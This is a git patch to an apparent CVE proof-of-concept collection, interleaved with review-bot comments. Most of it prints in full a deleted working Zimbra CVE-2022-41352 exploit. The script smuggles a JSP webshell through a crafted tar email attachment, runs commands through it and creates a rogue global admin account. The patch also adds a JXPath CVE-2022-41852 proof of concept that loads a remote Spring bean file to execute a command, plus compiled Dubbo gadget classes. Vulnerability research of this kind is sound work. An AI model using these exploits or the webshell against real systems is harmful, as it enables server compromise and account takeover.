From a6e23d52d1a3efabaad15d7535cf9adee550b316 Mon Sep 17 00:00:00 2001 From: FU Yunhao <19373124@buaa.edu.cn> Date: Thu, 18 May 2023 22:21:51 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-41852?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-41352/CVE-2022-41352.py | 236 ------------------ .../2022/CVE-2022-41852/README.md | 7 + .../CVE-2022-41852/target/CVE_2022_41852.java | 13 + .../2022/CVE-2022-41852/target/bean.xml | 16 ++ .../2022/CVE-2022-41852/target/pom.xml | 31 +++ .../2022/yaml/CVE-2022-41852.yaml | 18 ++ .../classes/DubboGadget/DubboGadget.class | Bin 0 -> 2270 bytes .../classes/DubboGadget/Utils$Foo.class | Bin 0 -> 424 bytes .../Utils$StubTransletPayload.class | Bin 0 -> 1362 bytes .../target/classes/DubboGadget/Utils.class | Bin 0 -> 8374 bytes openkylin_list.yaml | 1 + 11 files changed, 86 insertions(+), 236 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/README.md create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml create mode 100644 cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml create mode 100644 cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$Foo.class create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class diff --git a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py deleted file mode 100644 index f447f3d2..00000000 
--- a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python3 - -import sys -import smtplib -import argparse -from time import sleep -from email.mime.multipart import MIMEMultipart -from email.mime.application import MIMEApplication -from email.mime.text import MIMEText -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -# CONFIGURATION -#---------------------------------- -TARGET = 'mail.test.org' -WEBSHELL_PATH = '/public/jsp' -WEBSHELL_NAME = 'Startup1_3.jsp' -ATTACHMENT = 'payload.tar' -SENDER = 'test@test.org' -RECIPIENT = 'admin@test.org' - -EMAIL_SUBJECT = 'CVE-2022-41352' -EMAIL_BODY = 'Just testing.

Don\'t mind me.

' -#---------------------------------- - -# Only change this if zimbra was not installed in the default location -UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' - - -def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): - # Block 1 - link = lnk.encode() - mode = b'0000777\x00' # link permissions - ouid = b'0001745\x00' # octal uid (997) - ogid = b'0001745\x00' # octal gid - lnsz = b'00000000000\x00' # file size (link = 0) - lmod = b'14227770134\x00' # last modified (octal unix) - csum = b' ' # checksum = 8 blanks - type = b'2' # type (link = 2) - targ = payload_path.encode() # link target - magi = b'ustar \x00' # ustar magic bytes + version - ownu = b'zimbra' # user owner - owng = b'zimbra' # group owner - vers = b'\x00'*8 + b'\x00'* 8 # device major and minor - pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) - - raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod - raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] - raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 - # pad block to 512 - raw_b1 += b'\00'*(512-len(raw_b1)) - - # Block 2 - mode = b'0000644\x00' # file permissions - file = f'{lnk}/{payload_name}'.encode() - flsz = oct(len(payload))[2:] # file size - csum = b' ' # checksum = 8 blanks - type = b'0' # type (file = 0) - targ = b'\x00'*100 # link target = none - - raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod - raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] - raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 - # pad block to 512 - raw_b2 += b'\00'*(512-len(raw_b2)) - 
- - # Assemble - raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) - raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks - - return raw_tar - -# Update this if you want to use a legit email account for sending the payload -def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): - msg = MIMEMultipart() - msg['Subject'] = subject - msg['From'] = sender - msg['To'] = recipient - - message = MIMEText(body, 'html') - msg.attach(message) - - att = MIMEApplication(attachment) - att.add_header('Content-Disposition', 'attachment', filename=attachment_name) - msg.attach(att) - - try: - print(f'>>> Sending payload') - smtp_server = smtplib.SMTP(target,25) - smtp_server.sendmail(sender, recipient, msg.as_string()) - print(f'>>> Payload delivered') - except Exception as e: - print(f'[!] Failed to send the mail: {e}') - sys.exit(1) - -def verify_upload(target, shell, path): - print(f'>>> Verifying upload to {path}/{shell} ...') - sleep(5) # give the server time to process the email - resp = requests.get(f'https://{target}{path}/{shell}', verify=False) - if resp.status_code == 200: - print(f'>>> [PWNED] Upload successful!') - else: - print(f'>>> Upload unsuccesful :(') - sys.exit(1) - -def create_new_zimbra_admin(target, shell, path): - url = f'https://{target}' - pw = 'Pwn1ng_Z1mbra_!s_fun' - print(f'>>> Adding a new global administrator') - if (input(f'>>> Are you sure you want to continue? 
(yN): ') != 'y'): - sys.exit(0) - admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) - - print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') - print(f'>>> Email : {admin}') - print(f'>>> Password : {pw}') - - -def main(args): - global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY - - # Kali JSP WebShell - payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' - - # Using this instead of argparse default values to allow easy manual configuration as well - if args.payload: - try: - with open(args.payload, 'rb') as f: - payload = f.read() - except Exception as e: - print(f'Failed to read {args.payload}: {e}') - sys.exit(1) - print(f'>>> Using custom payload from: {args.payload}') - else: - print(f'>>> Using default payload: JSP Webshell') - if args.path: - WEBSHELL_PATH = args.path - if args.file: - WEBSHELL_NAME = args.file - if args.attach: - ATTACHMENT = args.attach - - tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) - - print(f'>>> Assembled payload attachment: {ATTACHMENT}') - print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'manual': - with open(ATTACHMENT, 'wb') as f: - f.write(tar) - print(f'>>> Attachment saved locally.') - sys.exit(0) - - if args.target: - TARGET = args.target - - print(f'>>> Targeting {TARGET}') - - if args.sender: - SENDER = args.sender - if args.recip: - RECIPIENT = args.recip - if args.subject: - EMAIL_SUBJECT = args.subject - if args.body: - try: - with open(args.body, 'rb') as f: - EMAIL_BODY = f.read().decode() - except Exception as e: - print(f'Failed to read {args.body}: {e}') - sys.exit(1) - print(f'>>> Using custom email body from: {args.body}') - - - smtp_send_file( TARGET, - SENDER, - RECIPIENT, - EMAIL_SUBJECT, - EMAIL_BODY, - tar, - ATTACHMENT ) - - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - - verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'auto': - sys.exit(0) - - if args.payload: - print(f'>>> (!) 
"fullpwn" depends on the default JSP webshell - won\'t create the admin account') - else: - create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - sys.exit(0) - -if __name__ == '__main__': - epi = ''' -Alternatively, edit the script to change the default configuration. - -The available modes are: - - manual : Only create the payload - you have to deploy the payload yourself. - auto : Create a webshell and deploy it via SMTP. - fullpwn : After deploying a webshell, add a new global mail administrator. -''' - - p = argparse.ArgumentParser( - description = 'CVE-2022-41352 Zimbra RCE', - formatter_class = argparse.RawDescriptionHelpFormatter, - epilog = epi - ) - p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') - - p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') - p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') - p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') - p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') - p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') - p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') - p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') - p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') - p.add_argument('--body', required=False, metavar='', help=f'file containing the html 
content for the email body (default: "{EMAIL_BODY}")') - - args = p.parse_args() - - main(args) \ No newline at end of file diff --git a/cve/apache-Commons/2022/CVE-2022-41852/README.md b/cve/apache-Commons/2022/CVE-2022-41852/README.md new file mode 100644 index 00000000..8085af9d --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/README.md @@ -0,0 +1,7 @@ +# CVE-2022-41852 + +``` +python3 -m http.server 8080 +java CVE_2022_41852.java +``` +导入pom.xml,同时在bean.xml目录下在8080端口创建web服务器后运行CVE_2022_41852.java,看到8080端口收到了请求,能够弹出计算器 \ No newline at end of file diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java b/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java new file mode 100644 index 00000000..d6415004 --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java @@ -0,0 +1,13 @@ +import org.apache.commons.jxpath.JXPathContext; + +public class CVE_2022_41852 { + public static void main(String[] args) { + try{ + JXPathContext context = JXPathContext.newContext(null); + String key = (String) context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:8080/bean.xml\")"); + System.out.println(key); + }catch (Exception exception){ + exception.printStackTrace(); + } + } +} diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml b/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml new file mode 100644 index 00000000..6f4b0e76 --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml @@ -0,0 +1,16 @@ + + + + + + bash + -c + calc.exe + + + + \ No newline at end of file diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml b/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml new file mode 100644 index 00000000..6657f7df --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml 
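Review bot: In `CVE_2022_41852.java` the `(String)` cast on the result of `context.getValue(...)` looks wrong. The expression constructs a `ClassPathXmlApplicationContext`, so the returned object is presumably not a `String`, and the resulting `ClassCastException` would be printed by the broad `catch (Exception exception)` as if the demonstration had failed. Hold the result as `Object result = context.getValue(...);` and catch `JXPathException` rather than `Exception`. The class also has no comment saying what it shows; a short class-level comment should state that passing an externally influenced string to `JXPathContext.getValue` is the unsafe pattern, and that callers should evaluate only trusted expressions or restrict the context's function library with `setFunctions`.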
@@ -0,0 +1,31 @@ + + + 4.0.0 + + org.example + poc_cve_2022_41852 + 1.0-SNAPSHOT + + + 8 + 8 + + + + + + org.springframework + spring-context-support + 5.3.23 + + + + commons-jxpath + commons-jxpath + 1.3 + + + + diff --git a/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml b/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml new file mode 100644 index 00000000..c5bfe098 --- /dev/null +++ b/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml @@ -0,0 +1,18 @@ +id: CVE-2022-41852 +source: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47061 +info: + name: JXPath是apache公司提供的XPath的java实现,JXPath 提供了用于遍历 JavaBean、DOM 和其他类型的对象的图形的 API,同时提供了一套扩展机制使我们可以增加对这些对象之外的其他对象模型的支持(重点). + severity: CRITICAL + description: + 使用JXPath解释不受信任的XPath表达式的人可能容易受到远程代码执行攻击。处理XPath字符串的所有JXPathContext类函数都是易受攻击的,除了compile和compileath函数。XPath表达式可以被攻击者用来从类路径加载任何Java类,从而导致代码执行。 + scope-of-influence: + Apache Commons JXpath <= 1.3 + reference: + - https://blog.csdn.net/Xxy605/article/details/127303526 + classification: + cvss-metrics: Google Inc. AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H + cve-id: CVE-2022-41852 + cwe-id: None + cnvd-id: None + kve-id: None + tags: CVE-2022, Apache Commons Jxpath 
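Review bot: In `CVE-2022-41852.yaml` the `cvss-metrics` value `AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H` records no confidentiality or integrity impact, which contradicts both `severity: CRITICAL` and the description of remote code execution in the same record. Check the vector and its attributed source against the CVE record and correct whichever field is wrong, since triage tooling that reads this file will rank the entry by it. `cwe-id: None` leaves the weakness class unrecorded and should be filled in if the advisory assigns one. The description also spells a method name `compileath`, presumably `compilePath`, and the `name` field holds a product description rather than a short title for the issue.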
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class new file mode 100644 index 0000000000000000000000000000000000000000..b67caf0a1e5aee076ad30e3f70c9e46a6e019ac5 GIT binary patch literal 2270 zcmah~X;a%)6g>jlGC~Ammc%TfbRlN5o0hf#6Iu);kQ$qYEiP%PY%7k4ZMn9bK>MfK zWCoZr(@*`>AJyr3k{21fQ)Y~$r}NG|_uTug{{H8WKLIS_R~cOr?rc=kY4eGe&FNOe zbuYssVc=AIqeb#sF&9auPxXu?;r7NsES5ZZw!V3?p4{14OKeC8#GAN1t85f=Q3?K) zOx`FO)~bZ=(9EF(&$^k_{pjVZjF!)Y^)tN(68cnl;girGH;Q_qT1e~VeJ!2W1+7Wo zp;k7;b8XSLVv{Q9MnJ^?{3Nzs85Ie^xJ$k}6^ii`G@~eCBy`*^RcKQ-&oX++GR$H{ zMo_|FGoi*Cg<{84jAMevFn`C9UF|$?YFWYEf%-Tmc1^1I08(Ki@ek-)@j8oMxO2^6AntjJOX}vN@Gp4R1uG#srVd= ztaYi%E_v7?SbMCQ_9cPEC6UJ{ijrChTe& zW<=PyRxWGj$*M)2q|~*7f+YlGJYv8)&f#kXt>A0XZ{M)dYRQq%4T;ViDp)~G#X5K> zdf%1}OLv$g47&}f%O!pZk5xRu7V(zZkVjubGsiIrG7C}AifpeQt6t95^H$?xZ=9ME zrsDroIi3ZHI8RzL*-w*B0shMwg1b$D8*kv+or(5fABQpyTE@lRd4+;i9O1bj5j`>7 zAlVhiz%ifw_I>L{dwwWL;f1h!O2Lo#NybV2Oj4_By9y0y+GHQBJWqIw&rZv*E3}mua~;v`F7FO5m~&D@rtFc!<@WZFgctGg|8*tZ8n4pVfRB0G@%GuuCUj# z4vmDNP={U>Gwo*;WzccIRcrX0*ji3@3B}aA*KoB{CUyk{Y^(um%Y+!8IK>8SQTEJg zIio)|#QYs_4VbVn0#h7j-TZj49mUY*oezG<{D~D{npg4X3n=fQ{?5BD+!D|Bx{7{# zMeOI`uI-8NDt38iFLC?k7RBD8Isgn}h`=5UV}!(ac<b z+-tJkvSs&E>HvDlBZLSJ;_)Fq;#FosALA3U^oSAP#{U-?Wa3t5uP`0I#(e4$;hp(F zWbOhFj^?lMMdBJuT#PPzuCbB|dM>fL>$~uC%D$l{bNXCm(GNl z>vwp@2vM$!+2|M&twG)+@%gQi)*`>rzd+f0w`Vg_h%{oMla6_Bb5Pd5gCznG$1VOD#EY!kl>?9UKAQ++ra{V4`aLKV7Z}%+xS5_t#{s4c7 zr9Z(qEOuJVo0&J0c{B6z{q_#v0*5}f7+U>2N%WA<7s5tUD^qhk(Ar0lp|<2tJW9D* zM0d$j%&d9l$9PXh_elxB^BIO?l5M1s6 literal 0 HcmV?d00001 
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class new file mode 100644 index 0000000000000000000000000000000000000000..d58f75bf6a7b84030571615ad72b4f083163037d GIT binary patch literal 1362 zcmbu9$!-%t5QhJJUw(Z04B!Tqi^vfcYH_O-JrwO- z>AW4M0z1Fu;?}ki+6K}+6R(3vw2LSZ?)p*a*;sp#+4aP}@b{$G5rNR2(oPyJ0 zla0t1K~r#4j@WY++@7+8#l}D~R0$(|B5hwpCM1}p#-Nhao^Dp3XRZ!|Bl)@-r~_$^ z)Nw4wBca=YG}Yv!<@+69?k8Sb#96}4K~p%qg-dyh}Tj$3qTx65<s z;&Ft38#yFJ#%PRke}X+8kHq89%14ZSNS91-Kb$&OG0F2vcLAm_%@*M#PBG{-&kJmw zNilcW$|qm{M%+pfv)zw9L;{(?xfDw{j|+@TuosVE>uHb->{^Ol;S3U3H?u#nmoUq? a#5ae_96pCDY~?VI1s==nCtSr6Mt%a1&3H5b literal 0 HcmV?d00001 
diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class new file mode 100644 index 0000000000000000000000000000000000000000..4cabf006451dfdcbec54fe642c88bffa43efcce3 GIT binary patch literal 8374 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 literal 0 HcmV?d00001 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b6df6461..2d037bdc 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -46,6 +46,7 @@ cve: - CVE-2022-32532 apache-Commons: - CVE-2022-33980 + - CVE-2022-41852 influx-DB: - CVE-2019-20933 linux-kernel: -- Gitee
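Review bot: The `openkylin_list.yaml` hunk adds only `- CVE-2022-41852` under `apache-Commons`, but the same commit also deletes `cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py` and adds compiled `.class` files under `cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/`, and the subject mentions neither. The deleted path differs from the added CVE id by one digit (41352 vs 41852), so the deletion may be accidental. If the index still lists the Zimbra entry outside this hunk, it now points at a directory without its script; either restore the file or drop that entry in the same commit. The Dubbo `.class` files are build output with no source in this patch, so they cannot be reviewed and belong in a separate change or a `.gitignore` entry for `target/classes/`. The list continues before and after the lines shown in the hunk.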